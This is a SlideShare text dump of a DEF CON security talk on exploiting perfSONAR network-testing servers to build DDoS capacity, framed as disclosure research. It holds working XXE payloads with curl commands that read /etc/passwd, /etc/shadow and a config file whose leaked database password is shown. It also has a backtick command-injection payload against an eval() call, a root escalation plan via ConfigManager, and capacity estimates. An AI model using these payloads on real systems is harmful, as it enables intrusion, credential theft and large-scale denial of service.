SlideShare a Scribd company logo

Attacking Network Infrastructure to Generate a 4 Tbs DDoS

M
mark-smith

As bandwidth, computing power, and software advancements have improved over the years, we've begun to see larger and larger DDoS attacks against organizations. Often times these attacks employ techniques such as DNS Amplification to take advantage of servers with very large uplinks.

Internet
1 of 60
Download to read offline
ATTACKING NETWORK INFRASTRUCTURE TO GENERATE A 4 TB/S DDOS FOR $5 by Luke Young
$ WHOAMI ➤ Undergraduate Student - Junior ➤ 2nd year at DEF CON ➤ Website: bored.engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng
DISCLAIMER ➤ The views and opinions expressed in this presentation are those of the authors and do not necessarily reflect the official policy or position of any current or previous employer. Examples of exploitation performed within this presentation are only examples and they should not be utilized in the real-world.
AGENDA ➤ What is Internet2? ➤ What is perfSONAR? ➤ Exploiting perfSONAR ➤ Privilege Escalation to root ➤ Enumerating perfSONAR Instances ➤ Code Release and Q&A
BACKSTORY ➤ “The Internet is a global system of interconnected networks. The University connects to both the global Internet and a number of special research and education networks commonly referred to as Internet2. These networks provide high bandwidth connectivity enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world.”
WHAT IS A INTERNET2? ➤ “Internet2 is an exceptional community of U.S. and international leaders in research, academia, industry and government who create and collaborate via innovative technologies. Together, we accelerate research discovery, advance national and global education, and improve the delivery of public services.” ➤ 282 - Higher Education ➤ 86 - Corporations ➤ 66 - Affiliate members (Governments) ➤ 42 - Regional and State Education Networks
➤ Lookout ➤ Office 365 ➤ Rackspace ➤ SoftLayer ➤ Splunk ➤ VMWare ➤ Zoom WHAT IS A INTERNET2? ➤ AWS ➤ Azure ➤ Box ➤ Dropbox ➤ DocuSign ➤ Duo Security ➤ LastPass
WHAT IS A INTERNET2?
INTERNET2 PRODUCTS ➤ Trust Identity & Middleware ➤ InCommon Federation ➤ Shibboleth ➤ Performance & Analytics ➤ BWCTL - Bandwidth Test Controller ➤ NDT - Network Diagnostic Tool ➤ OWAMP - One-Way Ping ➤ perfSONAR - pS-Performance Toolkit
ATTACKING PERFSONAR
PERFSONAR ISSUE #783
PERFSONAR ISSUE #783
XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE author [ <!ELEMENT author (#PCDATA)> <!ENTITY ly "Luke Young"> ]> <presentations> <presentation> <name>Investigating the Practicality and Cost of Abusing Memory Errors</name> <location>DEF CON 23</location> <author>&ly;</author> </presentation> <presentation> <name>Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5</name> <location>DEF CON 24</location> <author>&ly;</author> </presentation> </presentations>
XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>
PERFSONAR ISSUE #783
PERFSONAR ISSUE #783 REBORN
PERFSONAR ISSUE #783 REBORN <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:data> &xxe; </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ... pulse:x:489:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin admin:x:500:505::/home/admin:/bin/bash sudo:x:501:506::/home/sudo:/bin/bash </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @passwd.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN <soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <soapenv:Fault> <faultcode>soapenv:Server.Internal</faultcode> <faultstring>Error parsing message: I/O error : Permission denied I/O error : Permission denied :1: parser error : Failure to process entity xxe g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ :1: parser error : Entity 'xxe' not defined g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ at /opt/perfsonar_ps/oppd_mp/bin/oppd.pl line 760 </faultstring> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope> curl -X POST -d @shadow.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>[main] sql_db_engine = django.db.backends.postgresql_psycopg2 sql_db_name = esmond sql_db_user = esmond sql_db_password = 7hc4m1 tsdb_root = %(ESMOND_ROOT)s/tsdb-data ... </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @esmond.xml http://perfSONAR:8090/
PERFSONAR EXPLOITATION ➤ XXS and XXE abundant ➤ RCE seemed impossible
PERFSONAR - BANDWIDTHGRAPH.CGI
PERFSONAR - BANDWIDTHGRAPH.CGI if ( scalar @childnodes == 1 ) { if ( $child->textContent =~ m/(E|e)rror/ || $child->textContent =~ m/Query returned 0 results/ ) { next; } } my %tsresult = (); my $throughput = eval( $child->getAttribute("throughput") ); my $eTime = $child->getAttribute("timeValue"); my $etimestamp; }
EXPLOITING PERFSONAR
PERFSONAR - BANDWIDTHGRAPH.CGI <nmwg:data id="data.16870844" metadataIdRef="metadata.7441249" xmlns:nmwg="http:// ggf.org/ns/nmwg/base/2.0/"> <iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29.823998065 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.0573e+08" timeType="iso" timeValue="Tue Oct 19 16:17:55.2163317044 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.29349e+08" timeType="iso" timeValue="Tue Oct 19 17:17:55.3262506549 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.24512e+08" timeType="iso" timeValue="Tue Oct 19 18:20:02.81157432 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="9.04838e+08" timeType="iso" timeValue="Tue Oct 19 19:17:56.3379084847 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.16295e+08" timeType="iso" timeValue="Tue Oct 19 22:21:00.284368039 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.32728e+08" timeType="iso" timeValue="Tue Oct 19 23:17:55.2126511324 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.18147e+08" timeType="iso" timeValue="Wed Oct 20 04:19:43.2927588221 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> </nmwg:data>
PERFSONAR - BANDWIDTHGRAPH.CGI my $cgi = new CGI; my $ma_url = $cgi->param('url'); my $key = $cgi->param('key'); ... if ( !defined $ma_url ) { print $cgi->header; my $errmsg = "Missing MA_URL"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } ... if ( !defined $key ) { ... if(!$key){ print $cgi->header; my $errmsg = "Unable to find matching MA key for provided parameters"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } }
PERFSONAR - BANDWIDTHGRAPH.CGI my $res = &getData( $ma_url, $key, $start, $end ); ... sub getData() { foreach my $k (@keyList){ my $ma = new perfSONAR_PS::Client::MA( { instance => $ma_url } ); ... my $result = $ma->setupDataRequest( ... );
 ... my @childnodes = $root->findnodes("./*[local-name()='datum']"); ... foreach my $child (@childnodes) { ... my $throughput = eval( $child->getAttribute("throughput") ); ... } } }
PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" id="message. 3046685" type=“EchoRequest"> <nmwg:metadata id=“metadata.12999789"> <nmwg:eventType>http://schemas.perfsonar.net/tools/admin/echo/2.0</ nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.12999789" id=“data.1942969”></nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:metadata id="metadata.1337"> <nmwg:eventType>success.test</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.1337"> <iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
PERFSONAR - BANDWIDTHGRAPH.CGI
PERFSONAR - OBTAINING ROOT
PERFSONAR - ROOT?
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER ➤ /etc/hosts ➤ /etc/ntp.conf ➤ /etc/ntp/step-tickers ➤ /etc/bwctld/bwctld.conf ➤ /etc/bwctld/bwctld.limits ➤ /etc/owampd/owampd.limits ➤ /usr/ndt/tcpbw100.html ➤ /opt/perfsonar_ps/ls_registration_daemon/ etc/ls_registration_daemon.conf ➤ /opt/perfsonar_ps/regular_testing/etc/ regular_testing.conf ➤ /opt/perfsonar_ps/toolkit/etc/ administrative_info ➤ /opt/perfsonar_ps/toolkit/etc/ enabled_services ➤ /opt/perfsonar_ps/toolkit/etc/ external_addresses ➤ /opt/perfsonar_ps/toolkit/etc/ ntp_known_servers
PERFSONAR - CONFIGMANAGER
Backup original bwctld.conf Use ConfigManager to stop bwctld Write executable posthook.pl Use ConfigManager to write new bwctld.conf Use ConfigManager to start bwctld PERFSONAR - CONFIGMANAGER Trigger a bwctl session, triggering posthook.pl as root Use ConfigManager to stop bwctld Remove posthook.pl Restore original bwctld.conf Use ConfigManager to start bwctld back to original configuration
PERFSONAR - CONFIGMANAGER
ENUMERATING PERFSONAR INSTANCES
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
PERFSONAR NETWORK MAPPING
MAP.GO / PS-SPLUNK
PERFSONAR NETWORK SUMMARY ➤ 970 Publicly routable nodes ➤ 12.51 TB of RAM ➤ 29.85 THz CPU Cycles ➤ Average Node: ➤ 13 GB of RAM ➤ 12 Cores at 2.6 GHz
PERFSONAR THEORETICAL NETWORK SPEED 5.719 Tb/s
CALCULATING ACTUAL NETWORK SPEED
CALCULATING ACTUAL NETWORK SPEED ➤ Enumerate all perfSONAR instances and their maximum interface speed ➤ Calculate instance location from GeoIP ➤ Match 5 closest instances of same or faster interface speed
CALCULATING ACTUAL NETWORK SPEED ➤ index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename external_address.address as address, external_address.speed as speed, services{}.enabled as enabled | where mvindex(enabled,0)="1" | fillnull value=10000000000 speed | iplocation address | map maxsearches=100000 search="search index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename services{}.enabled as peer_enabled | eval peer_enabled = mvindex(peer_enabled,0) | where peer_enabled="1" | eval address=$address$, speed=$speed$ | rename external_address.address as peer_address, external_address.speed as peer_speed | fillnull value=10000000000 peer_speed | where peer_address!=address AND peer_speed >= speed | eval lat=$lat$, lon=$lon$ | iplocation prefix=peer_ peer_address | eval distance=sqrt(pow(lat-peer_lat,2)+pow(lon-peer_lon,2)) | where distance!=0 | sort distance | head 5 | fields address, speed, peer_address, peer_speed, distance" | table address, speed, peer_address, peer_speed, distance
CALCULATING ACTUAL NETWORK SPEED ➤ Never run 2 tests with the same instance at the same time ➤ Never run more than 10 tests at the same time ➤ Never test a host that doesn’t have bwctl enabled
PERFSONAR ACTUAL NETWORK SPEED 3.703 Tb/s
LIVE DEMO
CONCLUSION ➤ oppd (XXE) - unresolved ➤ bandwidthGraph.cgi (RCE) - fixed by perfSONAR 3.5.1 on March 3rd ➤ ConfigDaemon (PrivEsc) - unresolved
CONCLUSION ➤ GitHub: http://www.github.com/bored-engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng

Recommended

Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...Felipe Prado
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...OpenDNS
 
Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.Webarchive of National Library of the Czech Republic
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 

Recommended

Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...Felipe Prado
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...OpenDNS
 
Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.Webarchive of National Library of the Czech Republic
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 
Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionRodrigo Montoro
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Timothy Spann
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualizationssusercb4686
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERUtah Networxs Consultoria e Treinamento
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationSean Chittenden
 
Terraform in action
Terraform in actionTerraform in action
Terraform in actionDamien Pacaud
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012Bharti Gupta
 
PPT
PPTPPT
PPTVideoguy
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Puppet
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineeringjtdudley
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Docker, Inc.
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performanceAndrew Rota
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at ScaleJeff Henrikson
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data TutorialMichael Hausenblas
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and ExtractionChristopher Frenz
 
How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problemmark-smith
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandboxmark-smith
 

More Related Content

Similar to Attacking Network Infrastructure to Generate a 4 Tbs DDoS

Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionRodrigo Montoro
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Timothy Spann
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualizationssusercb4686
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationSean Chittenden
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012Bharti Gupta
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Puppet
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineeringjtdudley
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Docker, Inc.
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performanceAndrew Rota
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at ScaleJeff Henrikson
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and ExtractionChristopher Frenz
 

Similar to Attacking Network Infrastructure to Generate a 4 Tbs DDoS (20)

Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detection
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern Automation
 
Terraform in action
Terraform in actionTerraform in action
Terraform in action
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012
 
PPT
PPTPPT
PPT
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
